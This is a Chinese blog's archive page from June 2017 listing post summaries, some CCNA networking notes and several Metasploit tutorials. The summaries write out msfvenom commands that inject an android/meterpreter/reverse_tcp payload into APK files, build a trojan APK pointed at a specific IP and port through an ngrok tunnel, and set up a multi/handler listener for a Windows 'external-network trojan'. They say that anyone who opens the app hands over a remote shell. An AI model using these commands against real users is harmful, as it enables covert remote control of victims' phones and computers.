2017年6月12日

CCNA笔记(3)

摘要: 网络类型 1,局域网 在一定范围的网络连接,只允许内部人员使用 2城域网 一个城市的网络连接在一起 3.广域网 一个省或者一个市的网络 所有的局域网加上广域网就是互联网 阅读全文

posted @ 2017-06-12 20:37 东京$ 阅读(135) 评论(0) 推荐(0)

metasploit魔鬼训练营(收集外围信息)

摘要: 现在我们时空穿越,来到魔鬼训练营的主角身上,现在我们要训练,对V公司进行渗透测试,回想起总监说的情报收集 1,外围搜集,指的是自己假装是一个正常用户来搜集情报 我们开启msf用auxiliary/scanner/http/dir_scanner模块来收集网站上的文件(此模块不怎么好用,还是awvs好 阅读全文

posted @ 2017-06-12 16:17 东京$ 阅读(649) 评论(0) 推荐(0)

2017年6月11日

msf向存在漏洞的apk注入payload

摘要: 命令:msfvenom -x /路径/apk -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 只要别人一打开这个被注入payload后的软件就可以获得meterpreter 当然你要启动msfconsole监听 msfconsole hale 阅读全文

posted @ 2017-06-11 20:27 东京$ 阅读(1142) 评论(0) 推荐(0)

2017年6月10日

CCNA笔记(2)

摘要: CCNA第一天笔记:何为因特网?答:因特网,是连接各台pc与终端设备,正是因为有了因特网,我们才能与全世界交流,玩在线游戏,在线学习。因特网给我们教育带来什么方便?答:没有了地域的阻止,可以在线学习,在线培训等因特网给我们带来的生活?答:因特网使我们生活变得方便起来,google,维基解密,yout 阅读全文

posted @ 2017-06-10 22:04 东京$ 阅读(241) 评论(0) 推荐(0)

2017年6月9日

在虚拟机中安装metasploit官方攻防模拟器

摘要: 首先我们要在windwos下载安装perl环境。下载地址: http://pan.baidu.com/s/1i3GLKAp 然后我们安装 点击next 我同意,next next next,然后他会安装,安装完后点击启动就好,我在虚拟机已经安好了 我们可以来测试一下perl环境是否真的搭建好了 在c 阅读全文

posted @ 2017-06-09 11:38 东京$ 阅读(1662) 评论(0) 推荐(0)

2017年6月7日

漏洞挖掘者的各种漏洞披露方法

摘要: 收集了一部分 1,公开披露,完全把漏洞和渗透测试代放出来,不给厂商时间出补丁 2,跟厂商商量,并给时间厂商出补丁 3,小规模的披露,这样会逐渐让这个漏洞变得的危险起来,如ms010-17 4,把漏洞发布到漏洞平台 阅读全文

posted @ 2017-06-07 17:57 东京$ 阅读(478) 评论(0) 推荐(0)

msfvenom向apk注入payload

摘要: 首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> -o /存放路径/注入成功的a 阅读全文

posted @ 2017-06-07 17:17 东京$ 阅读(1839) 评论(0) 推荐(0)

msfconsole弄外网手机木马

摘要: 创建个通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 现在我把这个apk导入到手机上然后运行 我们来运行 exploit 可以看到我们已 阅读全文

posted @ 2017-06-07 15:37 东京$ 阅读(3239) 评论(2) 推荐(2)

metasploit配置windows外网木马

摘要: 首先在命令端输入./ngrok tcp 2222然后会变成这样 我们测试一下,启动msfconsole msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpP 阅读全文

posted @ 2017-06-07 10:33 东京$ 阅读(1738) 评论(1) 推荐(1)

2017年6月6日

linux下的外网木马前期要的工具

摘要: 这周看了demon哥的博客弄msf外网马,自己试了一下 首先去ngrok官网下载对应的系统版本,如果对应下载那个标签是绿色的(这里不支持windows) 下载好后在linux提取出来 让我们来看看他的帮助 输入./ngrok -h 现在我们去ngrok注册一个账号,我已经注册了,注册完等录后 在终端 阅读全文

posted @ 2017-06-06 20:06 东京$ 阅读(356) 评论(0) 推荐(0)

导航